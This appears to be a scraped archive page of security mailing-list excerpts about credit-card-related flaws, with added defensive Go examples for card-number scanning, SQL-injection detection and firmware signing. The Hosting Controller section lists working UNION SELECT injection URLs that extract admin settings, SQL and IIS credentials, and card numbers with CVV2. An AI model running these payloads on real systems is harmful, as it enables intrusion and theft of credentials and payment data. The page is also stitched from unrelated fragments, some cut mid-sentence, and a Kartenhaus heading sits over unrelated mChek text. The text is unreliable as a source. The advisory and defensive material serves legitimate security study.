credit card

RE: Latest round of web hacking incidents for 2007 & Project news

soul" on the Web site of the police department in Tucson, Arizona. Only
unlike regular defacement, this time it is not the front page but rather the
news section that was modified.


WHID 2007-63: Credit card data theft at Kartenhaus, a Ticketmaster German
subsidiary
=========================================================================
Reported: 19 December 2007, Occurred: 30 September 2007

Classifications:

mChek 3.4 Information Disclosure

Application: mChek 3.4 by http://www.mchek.com/ 
Platform: Symbian OS 9.1, Series 60 v3.0. Other mobile platforms might behave in same way.
Severity: Low

Details:
mChek is an e-commerce application that lets users store multiple credit/debit cards on the phone and use them when required. mChek 3.4 writes the stored card numbers and the corresponding bank information to a file on the phone's file system without any protection. It also provides a feature to link bank accounts to the application, and that information goes into the same file. Upon inspection, the credit card number and the corresponding bank name were found in cleartext in phone storage. It was also observed that after a credit card is deleted from mChek's user interface, the card number continues to exist in the file on the phone's file system. If the phone is lost or stolen, or any other user of the phone is able to read its file system, the stored credit/debit card numbers and bank names can be compromised.

Vendor Response: 
mChek version 3.4 is an older version of the product. The current version is 3.8. In this version, card number, bank name and phone number are not stored in clear text but in encrypted storage. When the credit card information is deleted by the user, it is deleted from the application DB as well, but the behaviour is not the same on all phone makes and models. We are providing enough protection to the sensitive data stored, and the security is not dependent on the user's ability to read the file system of the phone. 
Having said that, even in version 3.4, only the credit card number and bank name were stored as cleartext. The risk was very low as it is not possible to make a transaction with the card number alone. All other sensitive data, like the expiry date for example, are encrypted and stored, and the encryption key is never stored on the mobile phone, making the information very secure.
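To check an application like this for the behaviour described, a practitioner dumps the phone's storage and looks for card numbers, including ones that survive deletion from the UI. The Go program below is an added example, not mChek's code and not part of the original advisory; the record layout in sampleStorage is constructed for illustration and is not the file format mChek uses. It extracts 13-19 digit runs, keeps only those that pass the Luhn check (so serial numbers and timestamps drop out), and reports them masked.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// sampleStorage is a constructed stand-in for an app data file dumped from a
// phone (not mChek's real format): two card records, one of which the UI has
// marked deleted but left on disk, plus a 16-digit serial that is not a card.
var sampleStorage = []byte(
	"REC\x01card=4111111111111111;bank=Example Bank;status=active\n" +
		"REC\x02card=5500000000000004;bank=Sample Bank;status=deleted\n" +
		"REC\x03serial=1234567890123456;status=active\n")

// digitRun matches anything long enough to be a PAN (13-19 digits).
var digitRun = regexp.MustCompile(`[0-9]{13,19}`)

// luhnValid reports whether s, a string of ASCII digits, passes the Luhn
// checksum every card number carries; it filters out serials, IDs and timestamps.
func luhnValid(s string) bool {
	sum := 0
	double := false
	for i := len(s) - 1; i >= 0; i-- {
		d := int(s[i] - '0')
		if double {
			d *= 2
			if d > 9 {
				d -= 9
			}
		}
		sum += d
		double = !double
	}
	return sum%10 == 0
}

// FindPANs returns every Luhn-valid digit run in data, in file order, whether
// or not the record around it is marked deleted: that is the point of the check.
func FindPANs(data []byte) []string {
	var found []string
	for _, m := range digitRun.FindAll(data, -1) {
		if luhnValid(string(m)) {
			found = append(found, string(m))
		}
	}
	return found
}

// Mask keeps the BIN and the last four digits, which is all a finding should show.
func Mask(pan string) string {
	return pan[:6] + strings.Repeat("*", len(pan)-10) + pan[len(pan)-4:]
}

func main() {
	for _, pan := range FindPANs(sampleStorage) {
		fmt.Println("cleartext card number found:", Mask(pan))
	}
}
```

Run it against a real dump by replacing sampleStorage with the file contents; the Luhn filter is what keeps the output usable on a file system image full of other digit runs, and the "deleted" record turning up is the finding the advisory describes.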


osCmax Shop CMS v2.5.1 - Multiple Web Vulnerabilities

- Unlimited Products and Categories
- Gift Vouchers/Coupons
- Download/Virtual Product support
- Secure/Stable code base
- Web Based admin Panel
- Supports PayPal, AuthorizeNet, real-time credit card processing
- Supports UPS, USPS and FedEx shipping
- Unlimited product Specials
- Separate customer groups (Retail, Wholesale, or add your own groups)
- Compatible with most other mods available for osCommerce


RE: An account of the Estonian Internet War

Dear Viktor, thank you for sharing your experience and your personal point 
of view, I appreciate that.

As to the banks, indeed actual, eventual, down-time was inconsequential 
(for some, 2 hours) while others still did not process credit card 
requests a month later. All-in-all, incident response made sure people in 
the streets only found out about certain issues through the press.

As to the technical evidence, indeed, the attacks, while sizable (c'mon, 
4 Mpps is still big) are almost insignificant when compared with the size of 

Re: Adgregate ShopAd widget validation is vulnerable to replay attack

On Tue, Apr 7, 2009 at 5:42 PM, Matthew Dempsky <matthew@dempsky.org> wrote:
> Adgregate is a "TechCrunch 50" startup that recently signed a
> distribution deal with Google/DoubleClick [1].  As a service, they
> offer a "viral widget" intended to be hosted on untrusted third-party
> sites through which consumers can enter their credit card information.
>  According to their website, they offer over 1.2 million products
> through this service.  More details can be found at [2].
>
> Consumers are able to validate that their data entry is secure by
> clicking on a "validate this widget" button within the widget.

Hosting Controller - Multiple Security Bugs (Extremely Critical)

            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select propname,adminname,propvalue,propname From Adminprop where 1=1 order by name
            ---SQL SERVER
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select Databasename,Owner,Loginname,Servername From SQLServer where 1=1 order by name
            ---IISPasswords
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select FolderID,WebsiteID,User,Folder From IISPasswords where 1=1 order by name
            ---CreditCards
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select creditcardno,expdate,isEncrypted,cvv2 From creditcard where 1=1 order by name
            ---DSN
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select DSNName,DSNOwner,FilePath,Driver From DSN where 1=1 order by name
            ---Domain Registration
            http://[HC URL]/accounts/accountmanager.asp?iconwebsite=&search=1&sortaction=1&sortfield=name union select domainname,domainpassword,ns1,ns1_IP From DomainRegistration where 1=1 order by name
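The requests above differ only in the sortfield value, a column name that the page concatenates into its SQL statement. A column name cannot be bound as a query parameter, so the fix is to map the request value onto a fixed list of permitted columns rather than to escape it. The Go program below is an added example, not Hosting Controller's code: ScanLog finds these payloads in constructed IIS-style log lines (the lines, field layout, addresses and timestamps are invented for the demo), and SortColumn/BuildQuery show the whitelist approach. The column list and the query template in BuildQuery are assumptions, since the page does not show the server-side statement.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// sampleLog holds constructed IIS W3C-style entries (date time c-ip cs-method
// cs-uri-stem cs-uri-query sc-status); addresses and times are invented.
// Line 2 carries the page's creditcard payload the way a browser encodes it.
var sampleLog = []string{
	"2008-01-10 09:14:02 10.0.0.7 GET /accounts/accountmanager.asp iconwebsite=&search=1&sortaction=1&sortfield=name 200",
	"2008-01-10 09:14:31 10.0.0.7 GET /accounts/accountmanager.asp iconwebsite=&search=1&sortaction=1&sortfield=name+union+select+creditcardno,expdate,isEncrypted,cvv2+From+creditcard+where+1%3d1+order+by+name 200",
	"2008-01-10 09:15:05 10.0.0.9 GET /accounts/accountmanager.asp iconwebsite=&search=1&sortaction=1&sortfield=owner 200",
	"2008-01-10 09:15:40 10.0.0.9 GET /accounts/accountmanager.asp iconwebsite=&search=1&sortaction=1&sortfield=name%2Cowner 500",
}

type Finding struct {
	LineNo int
	Param  string
	Reason string
}

// unionSelect is applied after URL decoding and whitespace folding, so "+",
// "%20" and runs of spaces between the keywords do not hide the pattern.
var unionSelect = regexp.MustCompile(`(?i)\bunion\b.*\bselect\b`)

// bareIdent is the only shape a column-name parameter may legitimately have.
var bareIdent = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)

// identParams lists the parameters that are supposed to carry a column name.
var identParams = map[string]bool{"sortfield": true}

// ScanLog flags requests whose query parameters contain a UNION SELECT, or
// whose column-name parameter is anything other than a single identifier.
func ScanLog(lines []string) []Finding {
	var out []Finding
	for i, line := range lines {
		f := strings.Fields(line)
		if len(f) < 7 {
			continue
		}
		params, err := url.ParseQuery(f[5]) // decodes %xx and '+'
		if err != nil {
			continue
		}
		for name, vals := range params {
			for _, v := range vals {
				norm := strings.Join(strings.Fields(v), " ")
				switch {
				case unionSelect.MatchString(norm):
					out = append(out, Finding{i + 1, name, "UNION SELECT in parameter"})
				case identParams[name] && v != "" && !bareIdent.MatchString(v):
					out = append(out, Finding{i + 1, name, "column-name parameter is not a bare identifier"})
				}
			}
		}
	}
	return out
}

// allowedSort maps accepted request values to column names. The list is an
// assumption for the demo; the real schema is not on the page.
var allowedSort = map[string]string{"name": "name", "owner": "owner", "website": "website"}

// SortColumn is the fix: the request value selects an entry from a fixed
// list, and the user's string itself never reaches the SQL text.
func SortColumn(param string) (string, error) {
	col, ok := allowedSort[strings.ToLower(param)]
	if !ok {
		return "", errors.New("unknown sort field: " + param)
	}
	return col, nil
}

// BuildQuery has the whitelisted column as its only dynamic part (the
// template is assumed for the demo, not Hosting Controller's statement).
func BuildQuery(sortParam string) (string, error) {
	col, err := SortColumn(sortParam)
	if err != nil {
		return "", err
	}
	return "SELECT name, owner, website, plan FROM accounts WHERE 1=1 ORDER BY " + col, nil
}

func main() {
	for _, f := range ScanLog(sampleLog) {
		fmt.Printf("line %d: %s (%s)\n", f.LineNo, f.Reason, f.Param)
	}
	if _, err := BuildQuery("name union select creditcardno,expdate,isEncrypted,cvv2 From creditcard"); err != nil {
		fmt.Println("rejected:", err)
	}
}
```

The second rule (bare identifier) is the one worth keeping in a detection: it catches comment tricks, inline-comment spacing and other obfuscations of the same injection without needing a signature for each, because a sort column never legitimately contains anything but letters, digits and underscores.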

Security flaw in Airtel DSL modems

The firmware image is readily available for download from Airtel's website, and from many other websites. The image consists of a
Linux kernel, a root file system, configuration data and possibly other binary blobs. There appears to be no authenticity check on the
image: the modem does not verify a signature before flashing, so it is easy to modify an image and replace the root file system with a malicious one. Worse yet, the modified root file system could disable further firmware updates. A malicious firmware image gives an attacker complete access to and control over the modem and all network traffic that passes through it.

5. Once an attacker has access to a modem (through telnet and/or a firmware update), he/she can launch the following attacks and more:
 * run man-in-the-middle attacks on the subscriber's traffic to capture passwords, credit card numbers and other confidential data (plain HTTP traffic is readable outright; TLS-protected sessions only if the user accepts a forged certificate)
 * inject malicious content into the network stream to compromise the user's system [viruses, trojans, malware, bots]
 * sniff, tap and monitor the user and his/her actions online
 * redirect the user's traffic and subject the user to spam or ads, or use DNS poisoning in inventive ways
 * generate network traffic to launch DDoS attacks, effectively hijacking the user's internet connection and turning the modem into a zombie bot
 * route nefarious network activity through hijacked modems to make it difficult or impossible to trace the attack's origin, and carry out illegal activities; the blame might then fall on an innocent Airtel subscriber, as his/her IP address would appear to be the source
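What the missing authenticity check looks like, as an added example that is not Airtel's firmware or its update code: the image layout, the FWIM magic and the CRC-only header are a constructed, hypothetical format standing in for a typical unsigned image, and the key pair is generated on the spot. ReplaceRootfs performs exactly the swap described above and the CRC still passes; only the Ed25519 signature check, with the vendor's public key held in storage the update cannot overwrite, rejects the modified image.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
	"hash/crc32"
)

// Hypothetical image layout (not the Airtel format), little-endian:
//   magic "FWIM" | kernelLen u32 | rootfsLen u32 | crc32 u32 | kernel | rootfs
// The CRC covers kernel+rootfs and is the only check an unsigned image offers.
const magic = "FWIM"
const hdrLen = 16

// BuildImage assembles an image and fills in the CRC.
func BuildImage(kernel, rootfs []byte) []byte {
	hdr := make([]byte, hdrLen)
	copy(hdr[0:4], magic)
	binary.LittleEndian.PutUint32(hdr[4:8], uint32(len(kernel)))
	binary.LittleEndian.PutUint32(hdr[8:12], uint32(len(rootfs)))
	body := append(append([]byte{}, kernel...), rootfs...)
	binary.LittleEndian.PutUint32(hdr[12:16], crc32.ChecksumIEEE(body))
	return append(hdr, body...)
}

// CheckCRC is all a modem without authenticity checks can do. It detects
// transfer corruption and nothing more: anyone can rebuild a modified image
// with a fresh CRC.
func CheckCRC(img []byte) bool {
	if len(img) < hdrLen || string(img[0:4]) != magic {
		return false
	}
	kl := binary.LittleEndian.Uint32(img[4:8])
	rl := binary.LittleEndian.Uint32(img[8:12])
	want := binary.LittleEndian.Uint32(img[12:16])
	if uint64(hdrLen)+uint64(kl)+uint64(rl) != uint64(len(img)) {
		return false
	}
	return crc32.ChecksumIEEE(img[hdrLen:]) == want
}

// ReplaceRootfs is the attack from the advisory: keep the vendor kernel, swap
// in a malicious root file system, recompute the CRC so the image still "verifies".
func ReplaceRootfs(img, newRootfs []byte) []byte {
	kl := int(binary.LittleEndian.Uint32(img[4:8]))
	return BuildImage(img[hdrLen:hdrLen+kl], newRootfs)
}

// Sign produces the vendor's detached signature over the entire image, header
// included, so the lengths and the CRC field are covered as well.
func Sign(priv ed25519.PrivateKey, img []byte) []byte {
	return ed25519.Sign(priv, img)
}

// VerifySigned is the check to run before flashing. The public key has to sit
// in storage the update cannot overwrite (bootloader or ROM); if it lived in
// the writable root file system, a malicious image would simply ship its own key.
func VerifySigned(pub ed25519.PublicKey, img, sig []byte) error {
	if !CheckCRC(img) {
		return errors.New("image malformed or corrupt")
	}
	if !ed25519.Verify(pub, img, sig) {
		return errors.New("signature does not verify: image is not from the vendor")
	}
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	img := BuildImage([]byte("vmlinux-sample"), []byte("squashfs-sample"))
	sig := Sign(priv, img)
	bad := ReplaceRootfs(img, []byte("squashfs-with-backdoor"))
	fmt.Println("genuine:  crc", CheckCRC(img), " sig", VerifySigned(pub, img, sig))
	fmt.Println("tampered: crc", CheckCRC(bad), " sig", VerifySigned(pub, bad, sig))
}
```

Signing the whole image rather than only the root file system also closes the "disable further updates" path: an image whose updater or bootloader section has been altered fails the same check.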



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
